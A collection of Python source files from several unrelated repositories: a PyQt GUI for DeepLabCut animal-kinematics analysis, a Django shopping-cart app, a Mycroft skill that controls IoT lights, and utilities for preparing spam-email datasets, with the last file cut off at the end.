from tkinter import filedialog, Tk
import os
from pathlib import Path
from lizardanalysis.start_new_analysis import new
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis import analyze_files, initialize
from functools import partial
from lizardanalysis.start_new_analysis import gui_define_video_orientation_v2
class WorkerSignals(QtCore.QObject):
'''
Defines the signals available from a running worker thread.
Supported signals are:
finished
No data
error
`tuple` (exctype, value, traceback.format_exc() )
result
`object` data returned from processing, anything
progress
`int` indicating % progress
'''
finished = QtCore.pyqtSignal()
error = QtCore.pyqtSignal(tuple)
result = QtCore.pyqtSignal(object)
progress = QtCore.pyqtSignal(int)
class Worker(QtCore.QRunnable):
'''
Worker thread
Inherits from QRunnable to handler worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function
'''
def __init__(self, fn, *args, **kwargs):
super(Worker, self).__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
# Add the callback to our kwargs
self.kwargs['progress_callback'] = self.signals.progress
@QtCore.pyqtSlot()
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
# Retrieve args/kwargs here; and fire processing using them
try:
result = self.fn(*self.args, **self.kwargs)
except:
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
finally:
self.signals.finished.emit() # Done
class DOKA_mainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(DOKA_mainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.threadpool = QtCore.QThreadPool()
###
# variables
###
self.project_name = ""
self.project_experimenter = ""
self.project_species = ""
self.DLC_path = ""
self.project_config_file = ""
self.progress = 0
self.updateProgress(self.progress)
self.project_loaded = False
self.label_buttons = []
self.new_label_buttons = []
self.x_coord = None
self.y_coord = None
self.label_coords = []
self.labels = []
self.labels_orig = self.labels.copy()
self.button_diameter = 20
self.animal = None
self.animal_image_size = None
self.QLabel_topcorner = (530, 180) # the top corner of the Qlabel which contains the pixmap image
self.new_label_counter = 0
self.new_labels = []
# create list of translated labels to use arbitrary naming convention
# format: ["name_in_DOKA","name_in_config"],[]...
self.label_reassignment = []
self.clicked = None
###
# assign button / lineEdit functions
###
self.ui.Project_name_lineEdit.textChanged.connect(self.set_project_name)
self.ui.Project_experimenter_lineEdit.textChanged.connect(self.set_project_experimenter)
self.ui.Project_species_lineEdit.textChanged.connect(self.set_project_species)
self.ui.Project_openDLCFiles_pushButton.pressed.connect(self.choose_DLC_folder)
self.ui.Project_confirmNew_pushButton.pressed.connect(self.confirmNew)
self.ui.Project_openConfig_pushButton.pressed.connect(self.choose_Existing_Project)
self.ui.Project_confirm_pushButton.pressed.connect(self.confirmExistingProject)
self.ui.Animal_lizard_pushButton.pressed.connect(self.select_Lizard)
self.ui.Animal_spider_pushButton.pressed.connect(self.select_Spider)
self.ui.Animal_ant_pushButton.pressed.connect(self.select_Ant)
self.ui.Animal_stick_pushButton.pressed.connect(self.select_Stick)
self.ui.animal_addNewLabels_pushButton.setCheckable(True)
self.ui.animal_addNewLabels_pushButton.clicked.connect(self.add_new_labels)
self.ui.animal_confirmAddedLabels_pushButton.pressed.connect(self.save_changes)
self.ui.letsGo_pushButton.pressed.connect(self.start_analysis)
###
# add enw labels functions:
def mouseLabelPos(self, QMouseEvent): # also tried mousePressEvent...
# TODO: Doesn't work, crashes when button is checked with if condition uncommmented, freezes (infinity loop??) like this.
print("mouse event")
# if QMouseEvent.button() == QtCore.Qt.LeftButton:
self.x_coord = QMouseEvent.pos()[0]
self.y_coord = QMouseEvent.pos()[1]
print("mouse click: ", QMouseEvent.pos())
name = "name"
self.new_labels.append([name, self.x_coord, self.y_coord])
self.draw_new_label_button()
def draw_new_label_button_threaded(self, progress_callback):
""" draws the last added label"""
self.new_label_buttons.append(QPushButton(str(len(self.label_buttons) + len(self.new_labels) + 1), self))
self.new_label_buttons[-1].setGeometry(int(self.new_labels[-1][1] - self.button_diameter / 2),
int(self.new_labels[-1][2] - self.button_diameter / 2),
self.button_diameter, self.button_diameter)
# setting radius and border
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid blue;color: white}"
self.new_label_buttons[-1].setStyleSheet(style_sheet_grey)
self.new_label_buttons[-1].setFont(QFont('Times', 9))
# set up mouse over text
self.new_label_buttons[-1].setToolTip('click to assign label from <b>config</b> file')
# to set custom stylesheets for QToolTip
# self.label_buttons[-1].setStyleSheet("QToolTip{background-color: black;color:white;border:black solid 1px}")
# connect to label select function. Using functools.partial to pass the number of the label as an additional
# argument to reuse the same dialog function for all label buttons
self.new_label_buttons[-1].clicked.connect(
partial(self.open_label_dialog, (len(self.label_buttons) + len(self.new_labels) + 1)))
self.new_label_buttons[-1].show()
def draw_new_label_button(self):
worker = Worker(self.draw_new_label_button_threaded)
self.threadpool.start(worker)
# (load / create) project functions
def set_project_name(self):
self.project_name = self.ui.Project_name_lineEdit.text()
self.setWindowTitle("DLC Output Kinematic Analysis" + " - " + self.project_name)
def set_project_experimenter(self):
self.project_experimenter = self.ui.Project_experimenter_lineEdit.text()
def set_project_species(self):
self.project_species = self.ui.Project_species_lineEdit.text()
def choose_DLC_folder_threaded(self, progress_callback):
root = Tk()
root.withdraw() # use to hide tkinter window
current_path = os.getcwd()
if self.ui.Project_openDLCFiles_lineEdit.text is not None:
current_path = self.DLC_path
selected_path = filedialog.askdirectory(parent=root, initialdir=current_path,
title='Please select a directory containing all DLC output files (.csv) for this project')
if len(selected_path) > 0:
self.DLC_path = selected_path
self.log_info(self.DLC_path)
self.ui.Project_openDLCFiles_lineEdit.setText(self.DLC_path)
root.destroy()
def choose_DLC_folder(self):
worker = Worker(self.choose_DLC_folder_threaded)
self.threadpool.start(worker)
def choose_Existing_Project(self):
worker = Worker(self.choose_Existing_Project_threaded)
self.threadpool.start(worker)
def choose_Existing_Project_threaded(self, progress_callback):
root = Tk()
root.withdraw() # use to hide tkinter window
current_path = os.getcwd()
if self.ui.Project_openConfig_lineEdit.text is not None:
current_path = self.ui.Project_openConfig_lineEdit.text
config_file_path = filedialog.askopenfilename(parent=root, initialdir=current_path,
title='Please select a the config file of project to open')
if len(config_file_path) > 0:
self.log_info("Selected project at: " + config_file_path)
self.ui.Project_openConfig_lineEdit.setText(config_file_path)
self.project_config_file = config_file_path
root.destroy()
def confirmNew(self):
self.project_set_up = False
if len(self.DLC_path) > 0 and len(self.project_name) > 0 and len(self.project_experimenter) > 0 and len(
self.project_species) > 0:
if self.animal is not None:
if os.path.exists(self.DLC_path):
worker = Worker(self.createProject_threaded, animal=self.animal)
worker.kwargs['animal'] = self.animal
self.threadpool.start(worker)
else:
self.log_warning("Invalid path to DLC Files!")
else:
self.log_warning("Select an animal before starting your project!")
else:
self.log_warning("Missing information to set up new project!")
def handleValueUpdated(self, value):
self.clicked = value
self.log_info("clicked value set to: " + self.clicked)
def createProject_threaded(self, animal, progress_callback):
print("in createProjectThreaded")
if self.animal == "lizard":
# TODO: fix direction of climbing GUI
#checker = gui_define_video_orientation_v2.ConfirmationChecker(self)
#checker.valueUpdated.connect(self.handleValueUpdated)
#self.w = gui_define_video_orientation_v2.directionGUI_mainWindow()
#self.w.show()
clicked = 3
else:
clicked = 1
date = datetime.datetime.today().strftime('%Y-%m-%d')
self.project_config_file = new.create_new_project(project=self.project_name,
experimenter=self.project_experimenter,
species=self.project_species,
file_directory=self.DLC_path,
animal=self.animal,
clicked=clicked)
self.ui.Project_openConfig_lineEdit.setText(self.project_config_file)
self.log_info("New project created: " + os.path.join(os.getcwd(), self.project_config_file))
sleep(0.02) # wait briefly to log info in correct order. I know, beautifully written code.
self.log_warning("Define framerate & shutter in created config.yaml")
sleep(0.02) # wait briefly to log info in correct order. I know, beautifully written code.
self.log_info("Click CONFIRM existing project to load generated config file!")
def confirmExistingProject(self):
if self.animal is not None:
# read in the config file: get labels and number of files
if len(self.project_config_file) > 0:
current_path = os.getcwd()
worker = Worker(self.confirmExistingProject_threaded)
self.threadpool.start(worker)
else:
self.log_warning("select a config file to open an existing project first!")
else:
self.log_warning("Select an animal before loading your project!")
def update_labels(self):
# clear list before loading elements from config file
self.ui.Labels_listWidget.clear()
style_sheet_green = "QPushButton{border-radius :" + str(
self.button_diameter / 2) + ";border: 2px solid green;color: white }"
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid grey;color: white}"
QToolTip.setFont(QFont('SansSerif', 9))
label_count = 0
for i, label in enumerate(self.label_coords):
found = ""
for elem in range(len(self.labels)):
# if the label is listed as a default label or as a reassigned label, colour the respective button
# we start by checking for reassigned labels
if [label[0], self.labels_orig[elem]] in self.label_reassignment:
self.label_buttons[i].setStyleSheet(style_sheet_green)
self.label_buttons[i].setToolTip('label: <b>' + self.labels_orig[elem] + '</b>')
# try find matching entry (only relevant, when a label has been previously incorrectly assigned
try:
orig_button = \
self.label_reassignment[self.label_reassignment.index([label[0], self.labels_orig[elem]])][
1]
# find entry in label_coords
ind = [i[0] for i in self.label_coords].index(orig_button)
# set old button, corresponding to the original label, to grey/unassigned
self.label_buttons[ind].setStyleSheet(style_sheet_grey)
self.label_buttons[ind].setToolTip('click to assign label from <b>config</b> file')
except:
pass
found = self.labels_orig[elem]
break
# if the button has not been reassigned we check the labels for an entry
if label[0] == self.labels[elem]:
self.label_buttons[i].setStyleSheet(style_sheet_green)
self.label_buttons[i].setToolTip('label: <b>' + self.labels_orig[elem] + '</b>')
found = self.labels_orig[elem]
break
if i < 10:
self.add_labels("(0" + str(i) + ")" + " " + found)
else:
self.add_labels("(" + str(i) + ")" + " " + found)
if found != "":
label_count += 1
self.ui.Labels_listWidget.sortItems(QtCore.Qt.AscendingOrder)
self.ui.Info_numLabels_lcdNumber.display(label_count)
def confirmExistingProject_threaded(self, progress_callback):
config_file = Path(self.project_config_file).resolve()
cfg = auxiliaryfunctions.read_config(config_file)
# get labels
self.labels = cfg['labels']
self.labels_orig = self.labels.copy()
# labels = "; ".join(labels) # bring list in gui printable format
# self.ui.Info_text_label.setText(labels)
# get number of files
files = cfg['file_sets'].keys() # object type ('CommentedMapKeysView' object), does not support indexing
filelist = [] # store filepaths as list
for file in files:
filelist.append(file)
number_of_files = len(filelist)
self.ui.Info_numFiles_lcdNumber.display(number_of_files)
calculations, calculations_str, MODULE_PREFIX = initialize(self.animal)
# check for label reassignment when re(loading) project configuration
if len(self.label_reassignment) > 0:
print("label reassignment: ", self.label_reassignment)
for reassignment in self.label_reassignment:
for i, label in enumerate(cfg['labels']):
if label == reassignment[1]:
cfg['labels'][i] = reassignment[0]
print("config labels: ", cfg['labels'])
try:
calculations_checked, calculations_checked_namelist, calculations_all_list = read_in_files.check_calculation_requirements(
cfg, calculations, calculations_str, MODULE_PREFIX)
# clear and reload all elements of the calculations table each time a project is loaded to avoid repeated
# display of the same entries
if self.project_loaded:
self.ui.calculations_tableWidget.setRowCount(0)
self.ui.calculations_tableWidget.setColumnCount(2)
for calc in calculations_all_list:
row_position = self.ui.calculations_tableWidget.rowCount()
self.ui.calculations_tableWidget.insertRow(row_position)
self.ui.calculations_tableWidget.setItem(row_position, 0, QTableWidgetItem(str(calc)))
if calc in calculations_checked_namelist:
self.ui.calculations_tableWidget.item(row_position, 0).setBackground(QColor(100, 255, 100))
self.ui.calculations_tableWidget.setColumnWidth(0, 200)
self.ui.calculations_tableWidget.setColumnWidth(1, 50)
self.ui.calculations_tableWidget.setHorizontalHeaderItem(0, QTableWidgetItem("Calculation"))
self.ui.calculations_tableWidget.setHorizontalHeaderItem(1, QTableWidgetItem("Run"))
except TypeError:
self.log_warning("No executable calculations found!")
# TODO Insert checkbox for desired calculations
self.project_loaded = True
self.update_labels()
def add_new_labels_threaded(self, progress_callback):
self.ui.animal_QLabel.mouseClickEvent = self.mouseLabelPos
### add new labels to animal: ###
def add_new_labels(self):
"""
this function enables the user to click onto the lizard image and generate new labels with left click,
move them with dragging and delete them with middle mouse button.
New labels will be stored as lists of the format ["name", x, y], where x and y are the coordinates in the image.
:return:
"""
# test if project has been loaded yet
# TODO: uncomment after testing
# if self.animal is not None:
# # read in the config file: get labels and number of files
# if len(self.project_config_file) > 0:
# ## put code below here!
# else:
# self.log_warning("select a config file to open an existing project first!")
# else:
# self.log_warning("Select an animal before loading your project!")
self.ui.animal_addNewLabels_pushButton.setChecked(True)
print("button is checked: ", self.ui.animal_addNewLabels_pushButton.isChecked())
self.ui.animal_QLabel.mouseClickEvent = self.mouseLabelPos
# worker = Worker(self.add_new_labels_threaded)
# self.threadpool.start(worker)
# TODO: get the correct size of image from self.animal_image_size in px to define coordinates correctly
# create list with new labels with the format: ["name", x, y]
def save_changes(self):
self.ui.animal_addNewLabels_pushButton.setChecked(False)
print("button is checked: ", self.ui.animal_addNewLabels_pushButton.isChecked())
# append labels to self.label_coords
for new_label in self.new_labels:
self.label_coords.append(new_label)
### INFO SECTION ###
def log_info(self, info):
now = datetime.datetime.now()
# TODO add item colour (red for warnings)
self.ui.Log_listWidget.addItem(now.strftime("%H:%M:%S") + " [INFO] " + info)
self.ui.Log_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def log_warning(self, info):
now = datetime.datetime.now()
self.ui.Log_listWidget.addItem(now.strftime("%H:%M:%S") + " [WARNING] " + info)
self.ui.Log_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def add_labels(self, label_text):
self.ui.Labels_listWidget.addItem(label_text)
self.ui.Labels_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def updateProgress(self, progress):
self.progress = progress
self.ui.Info_progressBar.setValue(int(self.progress))
def start_analysis(self):
if self.project_loaded:
worker = Worker(self.start_analysis_threaded)
worker.signals.progress.connect(self.updateProgress)
# parse the animal selected through the gui to the callback:
worker.kwargs['animal'] = self.animal
self.threadpool.start(worker)
else:
self.log_warning("A config file needs to be selected first!")
def start_analysis_threaded(self, progress_callback, animal):
self.log_info("Analyzing project at " + self.project_config_file)
analyze_files(self.project_config_file, self.label_reassignment, callback=progress_callback, animal=self.animal)
progress_callback.emit(100)
### ANALYSIS SECTION ###
def delete_label_buttons(self):
for button in self.label_buttons:
button.deleteLater()
self.label_buttons = []
def draw_label_buttons(self):
for num, label in enumerate(self.label_coords):
# create button for each label
self.label_buttons.append(QPushButton(str(num), self))
self.label_buttons[-1].setGeometry(int(label[1] - self.button_diameter / 2),
int(label[2] - self.button_diameter / 2),
self.button_diameter, self.button_diameter)
# setting radius and border
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid grey;color: white}"
self.label_buttons[-1].setStyleSheet(style_sheet_grey)
self.label_buttons[-1].setFont(QFont('Times', 9))
# set up mouse over text
self.label_buttons[-1].setToolTip('click to assign label from <b>config</b> file')
# to set custom stylesheets for QToolTip
# self.label_buttons[-1].setStyleSheet("QToolTip{background-color: black;color:white;border:black solid 1px}")
# connect to label select function. Using functools.partial to pass the number of the label as an additional
# argument to reuse the same dialog function for all label buttons
self.label_buttons[-1].clicked.connect(partial(self.open_label_dialog, num))
self.label_buttons[-1].show()
def open_label_dialog(self, num):
if self.project_loaded:
dlg = LabelSelectDialog(self)
dlg.setWindowTitle("select label: " + self.label_buttons[num].text())
for label in self.labels:
if label != "bodyparts":
dlg.comboBoxLabels.addItem(label)
if dlg.exec_():
self.log_info("assigned " + self.label_buttons[num].text() + " to " + dlg.comboBoxLabels.currentText())
new_assignment = [self.label_coords[num][0], dlg.comboBoxLabels.currentText()]
# remove previous reassignment, if present
if len(self.label_reassignment) > 0:
for i, pair in enumerate(self.label_reassignment):
if pair[0] == new_assignment[0]:
del self.label_reassignment[i]
self.label_reassignment.append(new_assignment)
# update existing project to display newly available calculations
self.confirmExistingProject()
else:
print("Canceled assignment!")
else:
self.log_warning("Load project before assigning labels!")
def select_Lizard(self):
lizard_img = QPixmap(os.path.join("GUI", "lizard_shape.svg"))
self.ui.animal_QLabel.setPixmap(lizard_img)
self.animal_image_size = self.ui.animal_QLabel.pixmap().size() # get's the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "lizard"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["nose", 652, 262],
["shoulder", 814, 271],
["spine", 915, 268],
["hip", 1027, 279],
["tail_middle", 1205, 366],
["tail_tip", 1205, 559],
["shoulder_fr", 813, 243],
["fr_knee", 828, 207],
["fr", 790, 205],
["fr_to", 781, 227],
["fr_to1", 757, 220],
["fr_tm", 742, 202],
["fr_ti1", 751, 173],
["fr_ti", 789, 170],
["shoulder_hr", 1037, 258],
["hr_knee", 1054, 218],
["hr", 1092, 245],
["hr_ti", 1095, 215],
["hr_ti1", 1113, 207],
["hr_tm", 1134, 203],
["hr_to", 1122, 266],
["hr_to1", 1163, 232],
["shoulder_hl", 1017, 301],
["hl_knee", 992, 331],
["hl", 1022, 365],
["hl_ti", 997, 374],
["hl_ti1", 991, 396],
["hl_tm", 1001, 416],
["hl_to", 1050, 385],
["hl_to1", 1039, 434],
["shoulder_fl", 820, 303],
["fl_knee", 826, 331],
["fl", 802, 353],
["fl_to", 790, 335],
["fl_to1", 767, 345],
["fl_tm", 758, 372],
["fl_ti1", 777, 397],
["fl_ti", 815, 386],
['spine_a', 862, 266], # workaround for now just add the new labels as defaults to lizards
['spine_c', 975, 269],
['tail_a', 1126, 317],
['tail_c', 1266, 460]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Spider(self):
spider_img = QPixmap(os.path.join("GUI", "spider_shape.svg"))
self.ui.animal_QLabel.setPixmap(spider_img)
self.animal_image_size = self.ui.animal_QLabel.pixmap().size() # get's the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "spider"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 744, 172],
["lm1", 848, 308],
["lb1", 936, 334],
["l2", 627, 334],
["lm2", 828, 377],
["lb2", 932, 351],
["l3", 761, 443],
["lm3", 880, 424],
["lb3", 931, 367],
["l4", 823, 558],
["lm4", 906, 448],
["lb4", 934, 381],
["r1", 1177, 173],
["rm1", 1072, 308],
["rb1", 984, 334],
["r2", 1299, 334],
["rm2", 1093, 376],
["rb2", 990, 351],
["r3", 1164, 444],
["rm3", 1042, 423],
["rb3", 991, 367],
["r4", 1100, 559],
["rm4", 1017, 450],
["rb4", 989, 382],
["head", 962, 318],
["body", 962, 390],
["tail", 961, 473]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Ant(self):
ant_img = QPixmap(os.path.join("GUI", "ant_shape.svg"))
self.ui.animal_QLabel.setPixmap(ant_img)
self.animal_image_size = self.ui.animal_QLabel.pixmap().size() # get's the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "ant"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 810, 200],
["lm1", 850, 275],
["lb1", 928, 298],
["l2", 774, 450],
["lm2", 854, 346],
["lb2", 933, 326],
["l3", 781, 554],
["lm3", 844, 423],
["lb3", 940, 346],
["r1", 1111, 200],
["rm1", 1069, 275],
["rb1", 992, 298],
["r2", 1145, 450],
["rm2", 1066, 346],
["rb2", 988, 326],
["r3", 1136, 554],
["rm3", 1074, 423],
["rb3", 980, 346],
["lmandible", 941, 168],
["rmandible", 979, 168],
["head", 959, 209],
["t1", 959, 296],
["t2", 959, 324],
["t3", 959, 340],
["abdomen", 959, 430]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Stick(self):
stick_img = QPixmap(os.path.join("GUI", "stick_shape.svg"))
self.ui.animal_QLabel.setPixmap(stick_img)
self.animal_image_size = self.ui.animal_QLabel.pixmap().size() # get's the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "stick"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 715, 464],
["rt1", 756, 272],
["lm1", 796, 451],
["lb1", 862, 383],
["l2", 886, 505],
["rt2", 909, 243],
["lm2", 929, 470],
["lb2", 956, 395],
["l3", 1206, 522],
["rt3", 1144, 237],
["lm3", 1073, 466],
["lb3", 1026, 396],
["r1", 715, 269],
["lt1", 756, 458],
["rm1", 795, 280],
["rb1", 862, 348],
["r2", 886, 227],
["lt2", 909, 487],
["rm2", 929, 263],
["rb2", 956, 339],
["r3", 1206, 211],
["lt3", 1144, 495],
["rm3", 1072, 267],
["rb3", 1026, 337],
["lantenna", 621, 455],
["rantenna", 621, 275],
["head", 816, 366],
["t1", 873, 366],
["t2", 962, 366],
["t3", 1024, 366],
["abdomen", 1304, 366]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
class LabelSelectDialog(QDialog):
def __init__(self, *args, **kwargs):
super(LabelSelectDialog, self).__init__(*args, **kwargs)
self.setWindowTitle("select label from config file")
buttons = QDialogButtonBox.Ok | QDialogButtonBox.Cancel
self.buttonBox = QDialogButtonBox(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.comboBoxLabels = QComboBox()
self.layout = QVBoxLayout()
self.layout.addWidget(self.comboBoxLabels)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
app = QtWidgets.QApplication([])
application = DOKA_mainWindow()
application.show()
sys.exit(app.exec())
```
#### File: JojoReikun/ClimbingLizardDLCAnalysis/lizardanalysis.py
```python
from lizardanalysis import cli
def main():
cli.main()
if __name__ == '__main__':
main()
``` |
{
"source": "jojoriveraa/titulacion-NFCOW",
"score": 2
} |
#### File: NFCow/products/views.py
```python
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .forms import ProductForm
from .models import Product
from shopping_carts.models import Shopping_Cart
from django.contrib.auth.models import User
from rel_products_shopping_carts.models import Rel_Product_Shopping_Cart
# Create your views here.
def product_detail(request, id):
if request.method == 'POST':
form = ProductForm(request.POST)
if form.is_valid():
q_product = Product.objects.filter(id = id)[0]
q_quantity = form.cleaned_data['quantity']
q_user = User.objects.filter(username = request.user)[0]
q1 = Shopping_Cart.objects.filter(user = request.user)
q2 = q1.filter(available = True)
if not q2:
q_shopping_cart = Shopping_Cart.objects.create_shopping_cart(date_time = timezone.now(), user = q_user)
else:
q3 = q2.order_by('date_time').reverse()[0]
q_shopping_cart = q3
shc_id = q_shopping_cart.id
Rel_Product_Shopping_Cart.objects.create(product = q_product, quantity = q_quantity, shopping_cart = q_shopping_cart)
return HttpResponseRedirect('/shopping-cart/%s' % shc_id)
else:
form = ProductForm(request.POST or None)
product = get_object_or_404(Product, id = id)
return render(request, 'product.html', {'form' : form, 'product' : product, 'q_user' : request.user})
```
#### File: NFCow/rel_products_orders/models.py
```python
from django.db import models
from orders.models import Order
from products.models import Product
# Create your models here.
class Rel_Product_Order(models.Model):
order = models.ForeignKey(Order)
product = models.ForeignKey(Product)
def price(self):
return self.product.price
def __str__(self):
return self.order.payment_date_time.strftime("%Y-%m-%d %H:%M:%S") + " ; " + self.order.user() + " ; " + self.product.name
```
#### File: NFCow/rel_products_shopping_carts/views.py
```python
from django.http import HttpResponseRedirect
from django.shortcuts import render
from .models import Rel_Product_Shopping_Cart
# Create your views here.
def product_remove(request, id, sc):
product_in_shopping_cart = id
shopping_cart_id = sc
Rel_Product_Shopping_Cart.objects.filter(id = product_in_shopping_cart).delete()
return HttpResponseRedirect('/shopping-cart/%s' % shopping_cart_id)
```
#### File: NFCow/restaurants/models.py
```python
from django.db import models
from categories.models import Category
# Create your models here.
class Restaurant(models.Model):
name = models.CharField(max_length = 255)
image = models.ImageField(upload_to = 'restaurants')
categories = models.ManyToManyField('categories.Category', blank = True, related_name = 'restaurants_category',)
def img(self):
return """
<img src="%s" height="42">
""" % self.image.url
img.allow_tags = True
img.admin_order_field = 'image'
def __str__(self):
return self.name
``` |
{
"source": "JojoSr/frx_iot_skill",
"score": 2
} |
#### File: JojoSr/frx_iot_skill/__init__.py
```python
import requests
from mycroft import MycroftSkill, intent_file_handler
class FrxIot(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
def send_command(self, unit, command, value):
cmd = { "id":unit, "command":command, "value":value}
resp = requests.post('http://10.0.3.100/api/Command', json=cmd)
self.log.info('Requesting Command For Url ....')
self.log.info(resp.status_code)
self.log.info(resp.text)
if resp.status_code != 200:
self.speak_dialog('err_'+command)
@intent_file_handler('light.on.intent')
def handle_lights_on(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '1')
self.speak_dialog('iot.frx')
@intent_file_handler('light.off.intent')
def handle_lights_off(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
@intent_file_handler('red_light.intent')
def handle_lights_red(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
@intent_file_handler('blue_light.intent')
def handle_lights_blue(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '1')
self.speak_dialog('iot.frx')
@intent_file_handler('white_lights.intent')
def handle_lights_white(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
def create_skill():
return FrxIot()
``` |
{
"source": "jojotshitenge/spam-detection-using-deep-learning",
"score": 3
} |
#### File: jojotshitenge/spam-detection-using-deep-learning/data_utils.py
```python
import pandas as pd
from keras.preprocessing import text
import pickle
import os
from bs4 import BeautifulSoup
from email.parser import Parser
parser = Parser()
# Load Data
def process_dataset():
data = pd.read_csv("data/enron.csv")
print(f"Total emails: {len(data)}")
emails = data['msg'].values
labels = [1 if x == "spam" else 0 for x in data['label'].values]
# Pre-process Data
# tokenizer = text.Tokenizer(char_level=True)
# tokenizer.fit_on_texts(emails)
# sequences = tokenizer.texts_to_sequences(emails)
# word2index = tokenizer.word_index
# num_words = len(word2index)
# print(f"Found {num_words} unique tokens")
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:"
char2index = {}
for i, c in enumerate(alphabet):
char2index[c] = i + 1
sequences = []
for email in emails:
seq = []
for c in email:
if c in char2index:
seq.append(char2index[c])
sequences.append(seq)
with open("data/dataset.pkl", 'wb') as f:
pickle.dump([sequences, labels, char2index], f)
process_dataset()
def process_email(filename):
with open(filename) as f:
email = parser.parse(f)
cleantext = ""
if email.is_multipart():
for part in email.get_payload():
soup = BeautifulSoup(part.as_string(maxheaderlen=1))
txt = soup.get_text()
txt = ' '.join(txt.split())
i = txt.find("Content-Transfer-Encoding")
txt = txt[i + len("Content-Transfer-Encoding"):].split(maxsplit=2)[2]
cleantext += txt
else:
soup = BeautifulSoup(email.get_payload())
txt = soup.get_text()
txt = ' '.join(txt.split())
i = txt.find("Content-Transfer-Encoding")
txt = txt[i + len("Content-Transfer-Encoding"):].split(maxsplit=2)[2]
cleantext += txt
print(cleantext)
# for filename in os.listdir("data/infy_spam_emails"):
# process_email(f"data/infy_spam_emails/{filename}")
```
#### File: jojotshitenge/spam-detection-using-deep-learning/email_utils.py
```python
import email.parser
import os
import stat
import sys
def ExtractSubPayload(filename):
''' Extract the subject and payload from the .eml file.
'''
if not os.path.exists(filename): # dest path doesnot exist
print("ERROR: input file does not exist:", filename)
os.exit(1)
fp = open(filename)
msg = email.message_from_file(fp)
payload = msg.get_payload()
if type(payload) == type(list()):
payload = payload[0] # only use the first part of payload
sub = msg.get('subject')
sub = str(sub)
if type(payload) != type(''):
payload = str(payload)
return sub + payload
def ExtractBodyFromDir(srcdir, dstdir):
'''Extract the body information from all .eml files in the srcdir and
save the file to the dstdir with the same name.'''
if not os.path.exists(dstdir): # dest path doesnot exist
os.makedirs(dstdir)
files = os.listdir(srcdir)
for file in files:
srcpath = os.path.join(srcdir, file)
dstpath = os.path.join(dstdir, file)
src_info = os.stat(srcpath)
if stat.S_ISDIR(src_info.st_mode): # for subfolders, recurse
ExtractBodyFromDir(srcpath, dstpath)
else: # copy the file
body = ExtractSubPayload(srcpath)
dstfile = open(dstpath, 'w')
dstfile.write(body)
dstfile.close()
###################################################################
# main function start here
# srcdir is the directory where the .eml are stored
print('Input source directory: ') # ask for source and dest dirs
srcdir = input()
if not os.path.exists(srcdir):
print('The source directory %s does not exist, exit...' % (srcdir))
sys.exit()
# dstdir is the directory where the content .eml are stored
print('Input destination directory: ') # ask for source and dest dirs
dstdir = input()
if not os.path.exists(dstdir):
print('The destination directory is newly created.')
os.makedirs(dstdir)
###################################################################
ExtractBodyFromDir(srcdir, dstdir)
``` |
{
"source": "jojowei-cooler/ad",
"score": 2
} |
#### File: ad/ad/ad_train.py
```python
import joblib
from ad_model.processing import PREPROCESS
from sklearn.metrics import f1_score
from sklearn.ensemble import IsolationForest
from database import DATABASE, DUMMY
import numpy as np
class modelling(object):
